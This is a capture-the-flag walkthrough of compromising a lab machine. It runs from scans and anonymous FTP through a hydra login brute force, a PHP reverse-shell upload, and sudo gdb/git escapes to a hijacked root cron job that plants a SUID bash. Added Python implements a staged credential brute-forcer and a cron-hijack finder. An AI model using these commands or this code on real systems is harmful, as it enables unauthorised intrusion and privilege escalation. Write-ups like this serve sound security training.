[Enumeration]
1. Port scan
nmap -Pn <ip>
There are 3 open ports: 21 (FTP), 22 (SSH) and 80 (HTTP).
2. OS and service scan
nmap -A -p 21,22,80 <ip>
FTP allows anonymous login.
3. Vuln scan
nmap --script vuln -p 21,22,80 <ip>
The HTTP site has a robots.txt.
4. Access HTTP site
View page source. Nothing much.
Access /robots.txt. It lists /admin-dir and a username, d4rckh.
Note it.
Access /admin-dir. There are 2 files.
Download all of them
wget http://<ip>/admin-dir/credentials.txt
wget http://<ip>/admin-dir/userid
Read them
cat userid
It looks like a list of usernames.
cat credentials.txt
It looks like a password list.
Brute-force the HTTP site's directories
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<ip>/ -x php,txt,html,sh,cgi
After waiting a while, nothing new turns up.
5. Access FTP
ftp <ip>
Name: anonymous
ls -la
There is 1 directory (...) and 1 file (test.txt).
Download test.txt
get test.txt
cd ...
There's another “...” inside.
ls -la
Download the file
get yougotgoodeyes.txt
Read downloaded file
cat test.txt
cat yougotgoodeyes.txt
It reveals another directory on the HTTP site.
6. Access hidden directory, “/sUp3r-s3cr3t”.
It’s a login panel.
Brute-force its sub-directories
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<ip>/sUp3r-s3cr3t/ -x php,txt,html,sh,cgi
There’s /images
Access /images. There’s another directory, /uploads.
Access uploads/
Access pogcat.png
7. Brute-force the login panel
Submit test:test and intercept the request with Burp Suite.
Now I have the parameter names.
Forward the request; the response carries an error message.
Let's brute-force it.
Craft the command
hydra -L userid -P credentials.txt <ip> http-post-form "/sUp3r-s3cr3t/authenticate.php:username=^USER^&password=^PASS^:F=Incorrect username!" -V -F -u
Run the command
Hydra reports a hit because, for one username, the response changed to “Incorrect password!”. The panel leaks whether a username exists, so that user (enox) is valid and only the password remains to be found.
Let’s craft the command again
hydra -l enox -P credentials.txt <ip> http-post-form "/sUp3r-s3cr3t/authenticate.php:username=^USER^&password=^PASS^:F=Incorrect password!" -V -F -u
Run the command
Log in with the found credentials. Success!
The panel allows file upload, so I can upload a reverse shell.
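The two hydra runs above work because the panel answers an unknown username with “Incorrect username!” and a wrong password for a known user with “Incorrect password!”, so the username can be confirmed first and the password list tried only against that user. The following Python is an added example of that staged logic, not code from the writeup: the form URL and field names are assumptions (modelled on authenticate.php with username/password), the wordlists are constructed stand-ins for userid and credentials.txt, and FakePanel is a constructed replacement for the real login page so the block runs offline.

```python
"""Two-stage login brute force driven by distinguishable error messages."""
import urllib.parse
import urllib.request

# Error strings the login panel returns, as quoted in the writeup.
BAD_USER = "Incorrect username!"
BAD_PASS = "Incorrect password!"


def classify(body):
    """Map a response body to the outcome the panel leaked."""
    if BAD_USER in body:
        return "bad_user"
    if BAD_PASS in body:
        return "bad_pass"
    return "success"


def make_http_poster(url, user_field="username", pass_field="password"):
    """Return post(user, password) -> body for a real form target.
    url and field names are assumptions, e.g. http://<ip>/sUp3r-s3cr3t/authenticate.php."""
    def post(user, password):
        data = urllib.parse.urlencode({user_field: user, pass_field: password}).encode()
        with urllib.request.urlopen(url, data=data, timeout=10) as resp:
            return resp.read().decode(errors="replace")
    return post


def find_user(post, users, probe_password="x"):
    """Stage 1: any answer other than 'bad_user' means the username exists."""
    for user in users:
        if classify(post(user, probe_password)) != "bad_user":
            return user
    return None


def find_password(post, user, passwords):
    """Stage 2: only the confirmed user is tried against the password list."""
    for password in passwords:
        if classify(post(user, password)) == "success":
            return password
    return None


def staged_bruteforce(post, users, passwords):
    """Return (user, password) or None; costs at most len(users) + len(passwords) requests."""
    user = find_user(post, users)
    if user is None:
        return None
    password = find_password(post, user, passwords)
    return None if password is None else (user, password)


class FakePanel:
    """Constructed stand-in for authenticate.php: same error strings, counts attempts."""
    def __init__(self, valid_user, valid_pass):
        self.valid_user, self.valid_pass = valid_user, valid_pass
        self.attempts = 0

    def __call__(self, user, password):
        self.attempts += 1
        if user != self.valid_user:
            return "<p>" + BAD_USER + "</p>"
        if password != self.valid_pass:
            return "<p>" + BAD_PASS + "</p>"
        return "<p>Welcome</p>"


# Constructed wordlists standing in for userid / credentials.txt.
USERS = ["alice", "enox", "bob"]
PASSWORDS = ["password", "letmein", "hunter2", "s3cret"]


def demo():
    """Run the staged attack against the fake panel; return result, requests used, and
    the request count a full user x password cross product would need."""
    panel = FakePanel("enox", "hunter2")
    result = staged_bruteforce(panel, USERS, PASSWORDS)
    return result, panel.attempts, len(USERS) * len(PASSWORDS)


if __name__ == "__main__":
    print(demo())
```

Against a real target, replace the FakePanel with make_http_poster(url). The point of the split is cost: hydra's first run only needs to walk the user list once with any password, and the second run walks the password list once, instead of every user against every password.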
8. Reverse shell
Prepare PHP shell
Change the IP and port to my own.
Create listener
nc -lvp 1234
Upload it.
It should land in http://<ip>/sUp3r-s3cr3t/images/uploads, the directory found by the earlier scan.
Access it. I can see my file.
Click it. Back on my listener I now have a shell, but it's not stable.
9. Stabilise the shell
Reference:
python -c 'import pty;pty.spawn("/bin/bash");'
Ctrl+z
stty raw -echo
fg
export TERM=xterm
After “stty raw -echo” the screen seems stuck, but it isn't: just type “fg” and press Enter.
10. Search for users
cat /etc/passwd
There are 3 users on this machine: root, thirtytwo, and d4rckh.
11. Search for user.txt
Let’s explore /home
cd /home
ls -la
There are 3 directories.
cd cleanup
ls -la
cd ../d4rckh
ls -la
There's user.txt
cat user.txt
[Privilege Escalation]
1. Check sudo
sudo -l
I can run /var/www/gdb as thirtytwo
I'll have to adjust the usual gdb shell-escape command to run as thirtytwo.
sudo -u thirtytwo /var/www/gdb -nx -ex '!sh' -ex quit
whoami
Now I'm thirtytwo.
Get TTY shell
python -c 'import pty;pty.spawn("/bin/bash");'
2. Check sudo as thirtytwo
sudo -l
I can run git as d4rckh.
There are 4 candidate commands. Let's try them one by one.
sudo -u d4rckh PAGER='sh -c "exec sh 0<&1"' git -p help
Failed: sudo's default env_reset does not let a PAGER value set on the command line through unless the sudoers rule permits it (setenv or env_keep), so git never sees it.
Try another one
sudo -u d4rckh git -p help config
Inside the pager, type:
!/bin/sh
whoami
Success! Now I'm d4rckh.
Get TTY shell
python -c 'import pty;pty.spawn("/bin/bash");'
3. Escalate privileges from d4rckh
Verify sudo
sudo -l
It asks for a password.
Verify SUID
find / -perm -u=s -type f 2>/dev/null
gdb stands out, but I've already used it.
Verify capabilities
getcap -r / 2>/dev/null
Verify cron
cat /etc/crontab
A root job runs a script, cleanup.py.
Let's take a look at it.
ls
cat cleanup.py
I can replace it to get a shell as root.
Back it up first
mv cleanup.py cleanup.py.bak
ls
Edit the file
nano cleanup.py
nano won't start without a terminal type, so I have to fix that first.
After googling, the fix is to set TERM:
export TERM=xterm
nano cleanup.py
Replace the command with:
cp /bin/bash /tmp/rootbash;chmod +xs /tmp/rootbash
Wait about 2 minutes for the cron job to run.
cd /tmp
ls -la
/tmp/rootbash -p
whoami
The -p flag matters: without it bash drops the SUID effective uid back to the real uid.
cd /root
ls -la
cat root.txt
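The “Verify cron” step above boils down to one check: is there a job that runs as root from a script, or from a directory, that the current user can write to? The mv/nano steps only work because that is the case here. The following Python is an added example of that check, not code from the writeup; it generalises the manual `cat /etc/crontab` by parsing system-crontab lines (schedule, user, command) and reporting root jobs whose executable or its parent directory is writable. The sample crontab and permission map are constructed (the real /etc/crontab is not shown in the writeup, and the path /home/cleanup/cleanup.py is an assumption based on the cleanup home directory).

```python
"""Find cron jobs that run as root from a script the current user can replace."""
import os


def parse_system_crontab(text):
    """Parse /etc/crontab-style lines into (user, command) pairs.
    System crontabs have a user field between the schedule and the command;
    variable assignments, comments and blank lines are skipped."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):            # @reboot / @daily style: one schedule field
            parts = line.split(None, 2)
            if len(parts) != 3:
                continue
        else:                               # m h dom mon dow user command
            parts = line.split(None, 6)
            if len(parts) != 7:             # e.g. SHELL=/bin/sh has too few fields
                continue
        jobs.append((parts[-2], parts[-1]))
    return jobs


def hijackable_jobs(crontab_text, is_writable=lambda p: os.access(p, os.W_OK), target_user="root"):
    """Return (path, reason) for target_user jobs whose executable, or the directory
    holding it, is writable. A writable directory is enough: the script can be moved
    aside and replaced, which is what the mv + nano steps above do."""
    findings = []
    for user, command in parse_system_crontab(crontab_text):
        if user != target_user:
            continue
        exe = command.split()[0]
        if not exe.startswith("/"):         # PATH-relative command; needs a different check
            continue
        if is_writable(exe):
            findings.append((exe, "file writable"))
        elif is_writable(os.path.dirname(exe)):
            findings.append((exe, "directory writable"))
    return findings


# Constructed crontab modelled on the layout described in the writeup.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/2 *   * * *   root    /home/cleanup/cleanup.py
0 3     * * *   root    /var/backups/rotate.sh
@daily          d4rckh  /home/d4rckh/backup.sh
"""

# Constructed permission map standing in for os.access on the target box.
WRITABLE = {"/home/cleanup/cleanup.py", "/var/backups", "/home/d4rckh", "/home/d4rckh/backup.sh"}


def demo():
    """Run the check against the constructed crontab and permission map."""
    return hijackable_jobs(SAMPLE_CRONTAB, is_writable=lambda p: p in WRITABLE)


if __name__ == "__main__":
    for path, reason in demo():
        print(f"{path}: {reason}")
    # On a real box, drop the custom is_writable and let os.access decide.
    if os.path.exists("/etc/crontab"):
        with open("/etc/crontab") as f:
            print(hijackable_jobs(f.read()))
```

Only the first token of the command is inspected; a job like `cd / && run-parts ...` is skipped as PATH-relative, and /etc/cron.d entries would need the same parser run over each file. Once a hit is found, the payload is the one the writeup uses: replace the script body with `cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash` and run the copy with `-p`.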